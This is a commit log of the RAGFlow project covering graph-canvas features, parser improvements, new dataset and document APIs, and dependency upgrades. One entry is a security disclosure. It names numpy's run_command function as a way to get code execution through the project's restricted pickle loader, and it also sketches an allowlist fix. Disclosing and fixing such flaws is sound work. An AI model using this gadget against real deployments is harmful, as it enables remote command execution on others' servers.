### What problem does this PR solve?

feat: replace the graph icon in the header #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:31:34 +08:00
3b50389ee7 feat: add graph tab to header #918 (#1374)
### What problem does this PR solve?

feat: add graph tab to header #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:26:20 +08:00
258c9ea644 add keyword extraction in graph (#1373)
### What problem does this PR solve?
#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:57:25 +08:00
acd78c5ef2 feat: build nodes and edges from chat bot dsl #918 (#1372)
### What problem does this PR solve?
feat: build nodes and edges from chat bot dsl #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:15:14 +08:00
1d3e4844a5 feat: call the reset api before opening the run drawer each time #918 (#1370)
### What problem does this PR solve?

feat: call the reset api before opening the run drawer each time #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:10:45 +08:00
4122695a1a refine templates of graph (#1368)
### What problem does this PR solve?

#918 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 10:33:49 +08:00
3ccb62910b fix: add icon to MiniMax and Mistral #1353 (#1367)
### What problem does this PR solve?

fix: add icon to MiniMax  and Mistral #1353
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-04 10:24:43 +08:00
a6765e9ca4 Integrates LLM Azure OpenAI (#1318)
### What problem does this PR solve?

feat: Integrates LLM Azure OpenAI #716 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

### Other
This PR contains only the back-end code; the front end still needs to
provide a form for adding Azure OpenAI models.
   
#### Required parameters

- base_url
- api_key

---------

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-07-04 09:57:16 +08:00
dec3bf7503 feat: pull the message list after sending the message successfully #918 (#1364)
### What problem does this PR solve?

feat: pull the message list after sending the message successfully #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 09:55:08 +08:00
745e98e56a feat: create blank canvas #918 (#1356)
### What problem does this PR solve?

feat: create blank canvas #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 17:06:48 +08:00
1defc83506 API: create update_doc method (#1341)
### What problem does this PR solve?

Adds the API method of updating documents.


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 15:14:34 +08:00
65e59862e4 feat: create flow from dsl template #918 (#1351)
### What problem does this PR solve?

feat: create flow from  dsl template #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 14:42:48 +08:00
477a52620f feat: build nodes and edges from customer_service dsl #918 (#1348)
### What problem does this PR solve?

feat: build nodes and edges from customer_service dsl #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 14:03:25 +08:00
7c9ea5cad9 add interpreter to graph (#1347)
### What problem does this PR solve?

#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 12:15:15 +08:00
f6159ee4d3 feat: add DynamicParameters #918 (#1346)
### What problem does this PR solve?

feat: add DynamicParameters #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 12:00:56 +08:00
a7423e3a94 feat: add RelevantForm #918 (#1344)
### What problem does this PR solve?

feat: add RelevantForm #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 10:15:19 +08:00
25c4c717cb Add Intel IPEX-LLM setup under deploy_local_llm (#1269)
### What problem does this PR solve?

It adds the setup guide for using Intel IPEX-LLM with Ollama to
docs/guide/deploy_local_llm.md

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe): adds the setup guide for using Intel
IPEX-LLM with Ollama to docs/guide/deploy_local_llm.md
2024-07-02 18:55:24 +08:00
f9adeb9647 feat: add CreateFlowModal #918 (#1343)
### What problem does this PR solve?

feat: add CreateFlowModal #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-02 16:15:54 +08:00
04487d1bce feat: customize edge arrow #918 (#1338)
### What problem does this PR solve?

feat: customize edge arrow #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-02 11:43:57 +08:00
68b9a857c2 Doc: added doc for three doc methods (#1336)
### What problem does this PR solve?

Adds the documentation for three newly added API methods for content
management.

### Type of change

- [x] Documentation Update
2024-07-02 09:57:44 +08:00
5fa3c2bdce feat: modify the style of the operator #918 (#1335)
### What problem does this PR solve?

feat: modify the style of the operator #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 18:58:51 +08:00
b5389f487c API: created list_doc (#1327)
### What problem does this PR solve?

Adds the API for listing documents.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 18:15:00 +08:00
8b1c145e56 feat: modify the name of an operator #918 (#1333)
### What problem does this PR solve?

feat: modify the name of an operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 17:12:04 +08:00
92e9320657 upgrade laws parser of docx (#1332)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-07-01 15:50:24 +08:00
5eb21b9c7c feat: construct the edge of the classification operator from dsl #918 (#1329)
### What problem does this PR solve?

feat: construct the edge of the classification operator from dsl #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 14:37:05 +08:00
4542346f18 feat: get the operator type from id #918 (#1323)
### What problem does this PR solve?

feat: get the operator type from id #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 10:27:32 +08:00
fc7cc1d36c Optimize docx handle method in laws parser (#1302)
### What problem does this PR solve?

Optimize docx handle method in laws parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 17:42:59 +08:00
751447bd4f fix: fixed the issue where spaces could not be entered in the message… (#1320)
### What problem does this PR solve?

fix: fixed the issue where spaces could not be entered in the message
input box #1314
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-28 17:32:38 +08:00
f26d01dfa3 feat: add RelevantForm #918 (#1313)
### What problem does this PR solve?

feat: add RelevantForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 17:22:10 +08:00
cd3c739982 feat: add MessageForm #918 (#1312)
### What problem does this PR solve?

feat: add MessageForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 16:25:20 +08:00
44c7a0e281 feat: translate fields of CategorizeForm #918 (#1311)
### What problem does this PR solve?

feat: translate fields of CategorizeForm #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 15:29:29 +08:00
8c9b54db31 API: completed delete_doc api (#1290)
### What problem does this PR solve?

Adds the functionality of deleting documents.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 14:27:57 +08:00
6a7c2112f7 feat: limit there to be only one line between two nodes #918 (#1310)
### What problem does this PR solve?

feat: limit there to be only one line between two nodes #918
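
One way to express this rule, sketched in Python for illustration: before a new edge is accepted, check whether the two nodes are already joined. The function name `can_connect` is hypothetical, and treating the pair as unordered (so A→B also blocks B→A) is an assumption about what "between two nodes" means here.

```python
def can_connect(edges, source, target):
    """Return True if no edge already joins `source` and `target`.

    `edges` is an iterable of (source_id, target_id) pairs already on
    the canvas. The pair is compared as an unordered set, which is an
    assumption; a directed check would compare tuples instead.
    """
    pair = frozenset((source, target))
    return all(frozenset(edge) != pair for edge in edges)
```

Self-connections are not handled by this check; they would need a separate `source != target` test.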

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 12:01:06 +08:00
0acf4194ca feat: filter out selected values in other to fields from the curren… (#1307)
### What problem does this PR solve?

feat: filter out selected values in other to fields from the current
drop-down box options #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 11:40:21 +08:00
89004f1faf Update README.md (#1285)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-06-28 09:00:20 +08:00
5a36866cf2 feat: fix the problem of form entries being deleted when adding a new line #918 and clear the selection box to delete the corresponding edge (#1301)
### What problem does this PR solve?
feat: clear the selection box to delete the corresponding edge. #918
feat: fix the problem of form entries being deleted when adding a new
line #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 08:59:51 +08:00
c8523dc6fd Introduce new features (#1296)
### What problem does this PR solve?

Update README to introduce new features

### Type of change

- [x] Documentation Update
2024-06-27 18:09:59 +08:00
840e921e96 feat: set the edge as the data source to achieve two-way linkage betw… (#1299)
### What problem does this PR solve?

feat: set the edge as the data source to achieve two-way linkage between
the edge and the to field. #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 18:09:02 +08:00
5a1e01d96f feat: delete the edge on the classification node anchor when the anch… (#1297)
### What problem does this PR solve?

feat: delete the edge on the classification node anchor when the anchor
is connected to other nodes #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 15:48:11 +08:00
fbb8cbfc67 feat: restrict classification operators cannot be connected to Answer and other classification #918 (#1294)
### What problem does this PR solve?

feat: restrict classification operators cannot be connected to Answer
and other classification #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 14:57:40 +08:00
0ce720a247 fix mem leak for local reranker (#1295)
### What problem does this PR solve?

#1288
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:57:24 +08:00
47926a95ae Fix an OOM (Out Of Memory) error that ragflow may encounter when there are a lot of conversations (#1292)
### What problem does this PR solve?

Fix an OOM (Out Of Memory) error that ragflow may encounter when there
are a lot of conversations.
#1288

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: zhuhao <zhuhao@linklogis.com>
2024-06-27 14:48:49 +08:00
ff8793a031 Update sdk readme (#1291)
### What problem does this PR solve?

Polish grammar.

### Type of change

- [x] Documentation Update
2024-06-27 14:41:52 +08:00
a95c1d45f0 Support table for markdown file in general parser (#1278)
### What problem does this PR solve?

Support extracting table for markdown file in general parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 14:38:35 +08:00
45853505bb Fix occasional errors in pdf table recognition (#1277)
### What problem does this PR solve?

Fix occasional errors in pdf table recognition

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:37:58 +08:00
b3f782b3d3 Fix dependency conflict (#1293)
### What problem does this PR solve?

Fix dependency conflict

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:36:49 +08:00
16a1d24a02 Update README.md (#1286)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-06-27 13:38:36 +08:00
a943aefa4d feat: use useUpdateNodeInternals to solve the issue that the newly ad… (#1287)
### What problem does this PR solve?

feat: use useUpdateNodeInternals to solve the issue that the newly added
anchor points cannot be connected. #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 11:29:46 +08:00
038ca8c0ea docs: update quickstart.mdx (#1283)
### What problem does this PR solve?

minor fix

### Type of change

- [x] Documentation Update
2024-06-27 09:20:42 +08:00
fa5695c250 feat: add CategorizeHandle #918 (#1282)
### What problem does this PR solve?

feat: add CategorizeHandle #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 09:20:19 +08:00
e43208a1ca feat: change nodes to circular #918 (#1279)
### What problem does this PR solve?
feat: change nodes to circular #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-26 16:57:38 +08:00
fef663a59d feat: build categorize list from object #918 (#1276)
### What problem does this PR solve?

feat: build categorize list from object #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 19:28:24 +08:00
83b91d90fe feat: add DynamicCategorize #918 (#1273)
### What problem does this PR solve?

feat: add DynamicCategorize #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 16:17:12 +08:00
f6ae8fcb71 API: upload document api (#1264)
### What problem does this PR solve?

API: Adds the feature of uploading document.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 12:16:28 +08:00
d1ea429bdd feat: add LLMSelect (#1270)
### What problem does this PR solve?

feat: add LLMSelect #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 12:09:07 +08:00
b75bb1d8d3 Support displaying tables in the chunks of pdf file when using QA parser (#1263)
### What problem does this PR solve?

Support displaying tables in the chunks of pdf file when using QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 19:02:18 +08:00
6c6f5a3a47 feat: modify the background color of chat messages (#1262)
### What problem does this PR solve?

feat: modify the background color of chat messages #1215

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 18:23:22 +08:00
80163c043e Optimized the chat interface (including the chat API after sharing) (#1215)
### What problem does this PR solve?
Optimized the chat interface (including the chat API after sharing)
1. Change the background color of the dialog box between the assistant
and the user (use the theme color of the interface)
2. Add rounded corners to the dialog box
3. When the input box is empty, the send button cannot be clicked (because
some models report an error when sending empty data)

Color reference (can be a bit subjective):

![image](https://github.com/infiniflow/ragflow/assets/19431702/8cd6fcd9-8ca1-4160-8bac-9e8ba1a4112e)

### Type of change

- [x] Refactor

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-06-24 16:41:45 +08:00
9fcf9a10c6 Update SECURITY.md (#1248)
### What problem does this PR solve?

### Type of change

- [x] Documentation Update
2024-06-24 16:30:17 +08:00
38bd02f402 Support displaying images in the chunks of docx files when using general parser (#1253)
### What problem does this PR solve?

Support displaying images in chunks of docx files when using general
parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 16:29:36 +08:00
9a0736b20f feat: format code before submitting it #1251 (#1252)
### What problem does this PR solve?

feat: format code before submitting it #1251 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 14:48:21 +08:00
4fcd05ad23 fix Rerank Vector Similarity Score (#1249)
### What problem does this PR solve?

#1243 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-24 12:25:50 +08:00
f8fe4154e8 Place pdf's image at the correct position in QA parser (#1235)
### What problem does this PR solve?

Place pdf's image at the correct position in QA parser

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-24 10:41:03 +08:00
57970570ee Let json files support naive parsing methods #1245 (#1247)
### What problem does this PR solve?

Let json files support naive parsing methods #1245

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 10:40:51 +08:00
d185a2e7f2 Create SECURITY.md (#1241)
### What problem does this PR solve?

The restricted_loads function at
[`api/utils/__init__.py#L215`](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215)
is still vulnerable to code execution. The main reason is that the
numpy module has a numpy.f2py.diagnose.run_command function that directly
executes commands, and restricted_loads allows users to import
functions from the numpy module.
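
To illustrate the class of issue, here is a minimal sketch of a stricter unpickler that allows only exact `(module, name)` pairs instead of whole modules. It follows the `find_class` override pattern from the Python `pickle` documentation; it is not the project's actual `restricted_loads`, and the names `ALLOWED_GLOBALS`, `AllowlistUnpickler`, and `allowlist_loads`, as well as the allowlist contents, are hypothetical.

```python
import io
import pickle

# Hypothetical allowlist: exact (module, name) pairs, never whole modules.
# Allowing a whole module (for example everything under numpy) also exposes
# any helper in it that runs commands.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly listed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def allowlist_loads(data: bytes):
    """Deserialize `data`, rejecting any global outside ALLOWED_GLOBALS."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Even with an allowlist, unpickling untrusted input remains risky; a data-only format such as JSON avoids the problem where it is an option.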

### Additional Details

[https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240)

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-06-24 10:14:57 +08:00
a4ea5a120b feat: grey out the team function #1221 (#1244)
### What problem does this PR solve?

Grey out the team function #1221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 10:03:35 +08:00
15bf9f8c25 refine code to prevent exception (#1231)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-06-21 14:06:46 +08:00
18f4a6b35c feat: support json file (#1217)
### What problem does this PR solve?

feat: support json file.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-06-21 10:42:29 +08:00
f7cdb2678c polished doc for dataset API (#1219)
### What problem does this PR solve?

Added doc for API.

### Type of change

- [x] Documentation Update
2024-06-20 19:02:03 +08:00
3c1444ab19 Add docx support for manual parser (#1227)
### What problem does this PR solve?

Add docx support for manual parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-20 17:03:02 +08:00
fb56a29478 Add docx support for QA parser (#1213)
### What problem does this PR solve?

Add docx support for QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-20 16:09:09 +08:00
e99e8b93fb fix: failed to create new chunk in database #1159 (#1214)
### What problem does this PR solve?

Fix bug [#1159](https://github.com/infiniflow/ragflow/issues/1159):
use the embedding model (embd) that the user configured for the knowledge
base when creating a new chunk in the database.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-20 09:43:39 +08:00
5ec19b5f53 created get_dataset, update_dataset API and fixed: delete (#1201)
### What problem does this PR solve?

Added get_dataset and update_dataset API.
Fixed delete_dataset.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2024-06-19 18:01:38 +08:00
0b90aab22c fix: using embd which user configured at knowledgebase (#1163)
### What problem does this PR solve?
as title
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-19 14:44:25 +08:00
fe1805fa0e add README to graph (#1211)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-06-19 13:05:32 +08:00
f73f7b969c Update requirements_dev.txt 2024-06-19 08:50:32 +08:00
81d1c5a695 Update requirements.txt 2024-06-19 08:50:01 +08:00
8d667d5abd fixed: duplicate name (#1202)
### What problem does this PR solve?

Duplicate method name.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-18 16:28:46 +08:00
01ad2e5296 [doc] Hid new API doc on docusaurus site (#1198)
### What problem does this PR solve?


### Type of change
- [x] Documentation Update
2024-06-18 14:57:04 +08:00
fcdda9f8c5 Remove the visibilty of RAGFlow API (#1196)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-18 10:10:27 +08:00
e35f7610e7 fix too long query exception (#1195)
### What problem does this PR solve?

#1161 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-18 09:50:59 +08:00
7920a5c78d Add markdown support for QA parser (#1180)
### What problem does this PR solve?

Add markdown support for QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-18 09:45:13 +08:00
4d957f2d3b added api documentation and added more tests (#1194)
### What problem does this PR solve?

This PR added ragflow_api.md and more tests for API.

### Type of change

- [x] Documentation Update
- [x] Other (please describe): tests
2024-06-17 22:14:50 +08:00
a89389a05a [doc] RAGFlow's api key never expires (#1188)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-17 18:45:27 +08:00
d9a9be4b4c added documentation for api and fixed: duplicate get_dataset() (#1190)
### What problem does this PR solve?

Added the documentation for api and fixed duplicate get_dataset()
methods.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2024-06-17 17:54:06 +08:00
6be3626372 delete_dataset method and tests created (#1186)
### What problem does this PR solve?

This PR completes both the HTTP API and the Python SDK for
'delete_dataset'. In addition, there are tests for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-17 15:10:05 +08:00
1eb4caf02a create list_dataset api and tests (#1138)
### What problem does this PR solve?

This PR completes both the HTTP API and the Python SDK for 'list_dataset'.
In addition, there are tests for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-17 12:19:05 +08:00
f04fb36c26 upgrade version fix security bug (#1173)
### What problem does this PR solve?

Several dependencies have known security vulnerabilities and need to be upgraded; see the table below.


### Type of change

- [x] Other (please describe):

Name | Version | CVE | Upgraded version
-- | -- | -- | --
PyMySQL | 1.1.0 | CVE-2024-36039 | 1.1.1
Werkzeug | 3.0.1 | CVE-2024-34069 | 3.0.3
aiohttp | 3.9.3 | CVE-2024-30251 | 3.9.4
pillow | 10.2.0 | CVE-2024-28219 | 10.3.0
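
The minimum versions in the table can be checked mechanically. The following is a minimal sketch and not part of the PR: `MIN_VERSIONS` copies the upgraded versions from the table, while `parse_version` and `is_patched` are hypothetical helpers that only handle plain dotted numeric versions.

```python
# Minimum patched versions, copied from the table above.
MIN_VERSIONS = {
    "PyMySQL": "1.1.1",
    "Werkzeug": "3.0.3",
    "aiohttp": "3.9.4",
    "pillow": "10.3.0",
}


def parse_version(version: str) -> tuple:
    # Hypothetical helper: "3.9.4" -> (3, 9, 4); no pre-release handling.
    return tuple(int(part) for part in version.split("."))


def is_patched(name: str, installed: str) -> bool:
    # True when the installed version is at least the upgraded version.
    return parse_version(installed) >= parse_version(MIN_VERSIONS[name])
```

Comparing tuples of integers rather than raw strings matters here, because a string comparison would rank "3.10.0" below "3.9.4".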
2024-06-17 10:51:48 +08:00
747e69ef68 Fix Docker image building failure on MacOS (ARM architecture) (#1177)
### What problem does this PR solve?

#1164 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-17 10:46:21 +08:00
c68767acdd Fix VolcEngine BUG (#1165)
### What problem does this PR solve?
- Fix a bug for VolcEngine
- After testing, the current VolcEngine configuration also supports the
Doubao series

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-06-14 19:49:28 +08:00
4447039a4c refine doc about supporting PDF for Q&A (#1160)
### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-06-14 17:09:42 +08:00
90975460af Add pdf support for QA parser (#1155)
### What problem does this PR solve?

Support extracting questions and answers from PDF files

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 15:12:39 +08:00
7dc39cbfa6 add support for mistral (#1153)
### What problem does this PR solve?

#433 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 11:32:58 +08:00
a25d32496c support graph (#1152)
### What problem does this PR solve?

#918 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 10:49:36 +08:00
2023fdc13e fix file preview in file management (#1151)
### What problem does this PR solve?

fix file preview in file management

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-14 10:33:59 +08:00
64c83f300a feat: duplicate node #918 (#1136)
### What problem does this PR solve?
feat: duplicate node #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-13 09:09:34 +08:00
3b7b6240c3 feat: add delete menu to graph node #918 (#1133)
### What problem does this PR solve?
feat: add delete menu to graph node #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-12 17:38:41 +08:00
e05395d2a7 fix multi-modual bug (#1127)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-12 14:21:35 +08:00
169281958b feat: when a node of the graph is selected, the border of the node is highlighted. #918 (#1125)
### What problem does this PR solve?

feat: when a node of the graph is selected, the border of the node is
highlighted. #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-12 11:42:48 +08:00
abcd3d2469 refactor (#1124)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-06-12 11:02:15 +08:00
2cc89211f6 Update discord link (#1123)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-12 10:18:46 +08:00
0e3a877e5c feat: set the anchor points of all nodes to be enterable and exitable #918 (#1119)
### What problem does this PR solve?

feat: set the anchor points of all nodes to be enterable and exitable
#918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 19:31:52 +08:00
da64cfd173 [doc] Minor editorial updates. (#1115)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-11 18:42:58 +08:00
ff5ea266d2 feat: add icon to graph nodes #918 (#1117)
### What problem does this PR solve?

feat: add icon to graph nodes #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 18:01:19 +08:00
8902d92d0e feat: catch errors when sending messages #918 (#1113)
### What problem does this PR solve?

feat: catch errors when sending messages #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 15:46:12 +08:00
e28d13e3b4 Updated the doc for configuring api key (#1112)
### What problem does this PR solve?

#720 

### Type of change

- [x] Documentation Update
2024-06-11 13:52:27 +08:00
0b92f02672 feat: generate uuid with human-id #918 (#1111)
### What problem does this PR solve?

feat: generate uuid with human-id #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 11:58:49 +08:00
cf2f6592dd API: create dataset (#1106)
### What problem does this PR solve?

This PR implements 'create dataset' for both the HTTP API and the Python SDK.
HTTP API:
```
curl --request POST --url http://<HOST_ADDRESS>/api/v1/dataset   --header 'Content-Type: application/json' --header 'Authorization: <ACCESS_KEY>' --data-binary '{
  "name": "<DATASET_NAME>"
}'
```

Python SDK:
```
from ragflow.ragflow import RAGFLow
ragflow = RAGFLow('<ACCESS_KEY>', 'http://127.0.0.1:9380')
ragflow.create_dataset("dataset1")

```
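
For comparison, the same HTTP call can be prepared with Python's standard library. This is a sketch under assumptions, not part of the PR: the endpoint path and headers are copied from the curl example, the host is the one used in the SDK example, and `build_create_dataset_request` is a hypothetical helper that builds the request without sending it.

```python
import json
import urllib.request


def build_create_dataset_request(host: str, access_key: str, name: str) -> urllib.request.Request:
    """Build (but do not send) the POST request shown in the curl example."""
    body = json.dumps({"name": name}).encode("utf-8")
    return urllib.request.Request(
        url=f"http://{host}/api/v1/dataset",
        data=body,
        headers={
            "Content-Type": "application/json",
            "Authorization": access_key,
        },
        method="POST",
    )


request = build_create_dataset_request("127.0.0.1:9380", "<ACCESS_KEY>", "dataset1")
# urllib.request.urlopen(request) would send it to a running RAGFlow server.
```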

TODO: 
- Currently, ACCESS_KEY is the login_token issued when a user logs in to RAGFlow.
RAGFlow should let users add and delete access keys.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-11 11:16:37 +08:00
97ced2f667 fix: hide web crawl menu item (#1110)
### What problem does this PR solve?

fix: hide web crawl menu item #1107

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-11 10:54:30 +08:00
7eb69fe6d9 Supports obtaining PDF documents from web pages (#1107)
### What problem does this PR solve?

Knowledge base management supports crawling information from web pages
and generating PDF documents

### Type of change
- [x] New Feature (Support document from web pages)
2024-06-11 10:45:19 +08:00
68a698655a infinity: Update embedding_model.py (#1109)
### What problem does this PR solve?

I implemented infinity, a fast vector embeddings engine. 

### Type of change


- [x] Performance Improvement
- [X] Other (please describe):
2024-06-11 08:23:58 +08:00
f900e432f3 Add redis config (#1104)
### What problem does this PR solve?

Redis post config is missing

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-08 23:24:29 +08:00
267d6b28be Update README (#1101)
### What problem does this PR solve?

Update README for build from source.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-08 19:02:16 +08:00
706985c188 feat: add OperateDropdown and send debug message #918 (#1095)
### What problem does this PR solve?
feat: add OperateDropdown
feat: send debug message #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-07 19:27:27 +08:00
59efba3d87 add preview gif (#1097)
### What problem does this PR solve?

### Type of change

- [x] Documentation Update
2024-06-07 19:01:09 +08:00
22468a8590 [doc] Updated default value of quote in 'get answers' (#1093)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-07 14:08:59 +08:00
d0951ee27b fix: logger formater is not work (#1090)
### What problem does this PR solve?

as title

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 13:48:56 +08:00
31da511d1d feat: watch graph change (#1092)
### What problem does this PR solve?

feat: watch graph change #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-07 13:46:50 +08:00
f8d0d657fb Fixed a Docusaurus display issue (#1089)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-07 10:35:25 +08:00
923c3b8cac fix bug in api (#1088)
### What problem does this PR solve?

#1075 

